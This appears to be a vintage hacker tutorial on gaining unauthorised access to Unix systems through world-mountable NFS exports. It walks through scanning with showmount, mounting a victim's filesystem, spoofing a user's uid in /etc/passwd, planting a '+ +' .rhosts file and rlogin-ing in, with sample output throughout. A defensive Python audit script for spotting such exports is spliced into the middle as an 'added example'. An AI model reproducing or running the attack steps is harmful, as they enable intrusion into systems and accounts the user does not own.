Hack Mount Attack
-> Gaining access to unix systems (mount) <-
PLEASE NOTE: I don't think the showmount command is included, so if it doesn't work
then leave the command alone and move on to the next step!
YOU NEED ROOT TO DO THIS (SO USE A ROOT ACCOUNT)
This is not hard to do and there are many systems out there that are mountable.
Mount is a command in unix that will allow you to mount remote machines'
drives on yours. This is done so you can do installs from other machines,
or just share drives or directories across the network. The problem is
that many admins are not good with unix commands or setup. Or maybe they are
just plain lazy and mount the drives with world access, not understanding
that the world can mount the drive and gain write access to their users'
directories.
What you will need to get started here is a hacked root account. To be
able to mount the remote drive and gain access you will need to modify
the system's password file and use the su command.
Ok, let's say we have root access. Let's get started!
You can see if another system has mountable drives by using the showmount
command.
From root account:
$root> showmount -e wwa.com
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
Ok, no problem, this domain will not work, go on to the next one...
$root> showmount -e seva.net
Export list for seva.net:
/var/mail                                        pluto.seva.net
/home/user1                                      pluto.seva.net
/export/X11R6.3                                  rover.seva.net
/export/rover                                    rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
/usr/local                                       pluto.seva.net,rover.seva.net
Notice the (everyone). This would be good if we wanted to install linux from
this guy's box, but we want open directories to users.... so go on to
the next one...
$root> showmount -e XXXXX.XXX        < this one worked ... find your own ;)
Export list for XXXXX.XXX:
/export/home (everyone)
Now this guy mounted his home directory, the user accounts are off of
the home directory ;) and look above ... (everyone) can access it!
Ok, this section was to show you how to see if they are mountable; in the
next section I will show you how to mount and hack it. But for now, here
is a script that will scan for EVERY DOMAIN on the internet that is mountable
and log them for you.
To make it run in the background put a & after the command, like this:
cmount.pl&
How it works: When you run the file it will go to the domains list and run
showmount -e on each domain; if it finds that there is a return on mountable
drives it will save the info in the current directory in files named
domain.XXX.export. All you have to do is view the files and mount the
drives!
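As an added example (not part of the original article and not its cmount.pl script), here is a small Python audit an admin can run over the output of showmount -e for their own server: it parses the export list format shown above, in both the one-line and wrapped layouts, and flags every export that (everyone) may mount, rating home, mail and system trees as critical. The two sample listings are constructed from the export lists quoted in this article.

```python
import re

# World access to these trees is what the article above exploits: home
# directories (uid spoofing + .rhosts), mail spools and system files.
SENSITIVE = ("/home", "/export/home", "/var/mail", "/var/spool/mail", "/etc", "/usr")
WORLD = {"(everyone)", "everyone", "*"}

def parse_showmount(text):
    """Parse `showmount -e` output into (host, [(path, [client, ...]), ...]).
    Handles 'path clients' on one line and the client list wrapped onto the next."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    head = re.match(r"Export list for (\S+):\s*(.*)", lines[0])
    if not head:
        raise ValueError("not showmount -e output")
    body = ([head.group(2)] if head.group(2) else []) + lines[1:]
    exports, pending = [], None
    for ln in body:
        if ln.startswith("/"):
            parts = ln.split(None, 1)
            if len(parts) == 2:
                exports.append((parts[0], parts[1].split(",")))
            else:
                pending = parts[0]        # clients follow on the next line
        elif pending is not None:
            exports.append((pending, ln.split(",")))
            pending = None
    return head.group(1), exports

def is_world_mountable(clients):
    return any(c.strip().lower() in WORLD for c in clients)

def is_sensitive(path):
    return path == "/" or any(path == p or path.startswith(p + "/") for p in SENSITIVE)

def audit(text):
    """Return [(path, severity)] for every export that anyone may mount."""
    _, exports = parse_showmount(text)
    return [(p, "critical" if is_sensitive(p) else "warning")
            for p, clients in exports if is_world_mountable(clients)]

# Constructed samples, copied from the export lists shown in this article.
SEVA = """Export list for seva.net:
/var/mail pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
"""
DOMAIN = """Export list for domain.com:
/
everyone
/tmp
everyone
/var/spool/mail
titan/europa,galifrey
"""
```

Feed audit() the text of showmount -e against your own host; anything rated critical should be re-exported to named client hosts only.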
Ok, now on to mounting the drives .... let's say we did a showmount -e domain.com
and got back:
Export list for domain.com:
/               everyone
/p1             everyone
/p2             everyone
/p3             everyone
/p4             everyone
/p5             everyone
/p6             everyone
/p7             everyone
/tmp            everyone
/var/spool/mail titan/europa,galifrey
We would want to mount / .. yup .... this guy has his entire system mountable!
$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount
If he had the home directory mountable the command would be:
$root> mount -nt nfs domain.com:/home /tmp/mount
To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount
Make sure you make the mount directory first; you can make this anywhere on
the system that you want. If the system's /mnt directory is empty you can
use it also.
Ok, this is for real:
bash# ls -al /mnt                              ; making sure the mnt dir is empty
ls: /mnt: No such file or directory            ; there was not even a dir there ;)
bash# mkdir /mnt                               ; let's make one for them *grin*
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt  ; let's mount the sucker ...
bash# cd /mnt                                  ; changing to the mounted drive...
bash# ls                                       ; just the plain dir ..
TT_DB   home        raddb             share
back    local       radius-961029.gz  www
exec    lost+found  radius-961029.ps
bash#                                          ; there it is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l                                    ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x   2 judy     other      512 Feb  1 10:41 garry
drwxr-xr-x  69 infobahn other     5632 Mar 10 01:42 horke
drwxr-xr-x  11 301      other     2048 Mar  1 10:25 jens
drwxr-xr-x   2 300      other      512 Oct 15 07:45 joerg
drwxr-xr-x   2 604      other      512 Feb  8 13:00 mailadmin
drwxr-xr-x   2 melissa  other      512 Sep 27 06:15 mk
drwxr-xr-x   6 news     news       512 Mar  6  1996 news
drwxr-xr-x   4 jim      other      512 Sep 27 06:16 pauk
drwxr-xr-x   2 302      other      512 Mar  1 10:10 tom
drwxr-xr-x   5 601      daemon     512 Jan 26  1996 viewx
drwxr-xr-x  10 15       audio      512 Oct 17 08:03 www
drwxr-xr-x   2 303      other      512 Jan 24 04:17 norbert
bash#                                          ; notice tom is user number 302 ... hmmm let's put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash                   ; this should do it ;)
bash# su - tom                                 ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x   2 judy     other      512 Feb  1 10:41 garry
drwxr-xr-x  69 infobahn other     5632 Mar 10 01:42 horke
drwxr-xr-x  11 301      other     2048 Mar  1 10:25 jens
drwxr-xr-x   2 300      other      512 Oct 15 07:45 joerg
drwxr-xr-x   2 604      other      512 Feb  8 13:00 mailadmin
drwxr-xr-x   2 melissa  other      512 Sep 27 06:15 mk
drwxr-xr-x   6 news     news       512 Mar  6  1996 news
drwxr-xr-x   4 jim      other      512 Sep 27 06:16 pauk
drwxr-xr-x   2 tom      other      512 Mar  1 10:10 tom
drwxr-xr-x   5 601      daemon     512 Jan 26  1996 viewx
drwxr-xr-x  10 15       audio      512 Oct 17 08:03 www
drwxr-xr-x   2 303      other      512 Jan 24 04:17 norbert
NOTICE above that tom's user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts                    ; this will make a file in his dir called .rhosts
bash$                                          ; inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx                         ; we are tom on our machine, so let's just rlogin plain.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
>                                              ; yup we are in! And that's it. All in a day's work.
- r00t